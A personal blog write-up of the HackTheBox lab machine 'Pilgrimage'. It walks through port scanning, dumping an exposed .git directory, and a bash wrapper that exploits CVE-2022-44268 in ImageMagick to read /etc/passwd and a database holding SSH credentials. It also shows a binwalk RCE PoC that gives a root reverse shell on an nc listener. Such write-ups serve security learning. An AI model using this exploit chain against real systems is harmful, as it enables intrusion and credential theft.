cwoellner.com ~ personal website & blog

Writeup of Pilgrimage From HackTheBox

Published on: Monday, Nov 27, 2023

Getting a foothold and user flag

For the initial port scan, we use the following nmap command:

nmap -sS -A -Pn -T5 -p- -oN nmap.txt 10.129.222.8

And receive the following results:

PORT   STATE SERVICE
22/tcp open  ssh
| ssh-hostkey: 
|   3072 20be60d295f628c1b7e9e81706f168f3 (RSA)
|   256 0eb6a6a8c99b4173746e70180d5fe0af (ECDSA)
|_  256 d14e293c708669b4d72cc80b486e9804 (ED25519)
80/tcp open  http
|_http-title: Did not follow redirect to http://pilgrimage.htb/

The website allows us to upload register, log in and images. The rules for the image upload are quite relaxed and a payload hidden in the EXIF data can easily be uploaded, but I did not find any way to pass the uploaded image to the php engine. So I started bruteforcing directories and found an exposed .git directory:

>>> ffuf -u http://pilgrimage.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/quickhits.txt -mc 200

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.0.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://pilgrimage.htb/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/quickhits.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200
________________________________________________

[Status: 200, Size: 23, Words: 2, Lines: 2, Duration: 29ms]
    * FUZZ: /.git/HEAD

[Status: 200, Size: 195, Words: 13, Lines: 2, Duration: 29ms]
    * FUZZ: /.git/logs/HEAD

[Status: 200, Size: 92, Words: 9, Lines: 6, Duration: 31ms]
    * FUZZ: /.git/config

[Status: 200, Size: 3768, Words: 22, Lines: 16, Duration: 31ms]
    * FUZZ: /.git/index

[Status: 200, Size: 6166, Words: 1648, Lines: 172, Duration: 30ms]
    * FUZZ: /login.php

[Status: 200, Size: 6173, Words: 1646, Lines: 172, Duration: 47ms]
    * FUZZ: /register.php

The .git directory can be used to extract the source code of the repository. I use a tool called GitDump to accomplish this.

Looking at the index.php I find two potential points of attack: A exec command that calls imagemagick and a connection to a sqlite database. Upon further research, I find a recent imagemagick vulnerability with PoC: CVE-2022-44268. This exploit allows me to read files on the target, in order to simplify usage I write a small bash wrapper for the PoC:

#!/bin/bash
cargo run -q "$1"
url=$(curl -F "toConvert=@image.png" http://pilgrimage.htb -i -s | grep Location | sed 's/Location: \/?message\=\(.*\)&status=success/\1/' | tr -d '\r')
curl $url --output output.png -s
rm image.png
hex=$(identify -verbose output.png | head -n -12 | tail -n +102 | tr -d '\n')
python -c "print((bytes.fromhex('$hex')))"

All if have to do is run “./exploit.sh /etc/passwd” and, if my user has the permission to read it, get the file contents back. I first check /etc/passwd, the exploit returns the file and I now know the name of the local user: emily.

The next file I try is the sqlite database, scrolling through the raw database I find something that might be credentials: sqlite credentials

I try to log into ssh using the credentials emily:abigchonkyboi123 and the password gets accepted. I now have access to the user flag.

Root Flag

As usual, I start off by running linpeas and I find an unusual process:

════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════
                ╚════════════════════════════════════════════════╝
╔══════════╣ Cleaned processes
╚ Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes
root         655  0.0  0.0   6816  3004 ?        Ss   Jun25   0:00 /bin/bash /usr/sbin/malwarescan.sh
root         683  0.0  0.0   2516   716 ?        S    Jun25   0:00  _ /usr/bin/inotifywait -m -e create /var/www/pilgrimage.htb/shrunk/
root         684  0.0  0.0   6816  2440 ?        S    Jun25   0:00  _ /bin/bash /usr/sbin/malwarescan.sh

I can read the malwarescan file and take a closer look at it:

#!/bin/bash

blacklist=("Executable script" "Microsoft executable")

/usr/bin/inotifywait -m -e create /var/www/pilgrimage.htb/shrunk/ | while read FILE; do
	filename="/var/www/pilgrimage.htb/shrunk/$(/usr/bin/echo "$FILE" | /usr/bin/tail -n 1 | /usr/bin/sed -n -e 's/^.*CREATE //p')"
	binout="$(/usr/local/bin/binwalk -e "$filename")"
        for banned in "${blacklist[@]}"; do
		if [[ "$binout" == *"$banned"* ]]; then
			/usr/bin/rm "$filename"
			break
		fi
	done
done

Whenever a new file appears in the shrunk directory, which usually happens after a file gets uploaded and resized, it gets passed to binwalk. Since I was not familiar with binwalk I looked up if there were any recent vulnerabilities and found this Writeup for a recent RCE as well as a PoC.

I cloned the PoC repo, generated a payload uploaded it through the website and got nothing back. Next I tried placing the file manually in the directory using the emily user and got a reverse shell for the root user.

>>> nc -lnvp 4444 
Listening on 0.0.0.0 4444
Connection received on 10.129.163.225 51056
id
uid=0(root) gid=0(root) groups=0(root)
Want to chat about anything you read on here? Feel free to e-mail me at christian@cwoellner.com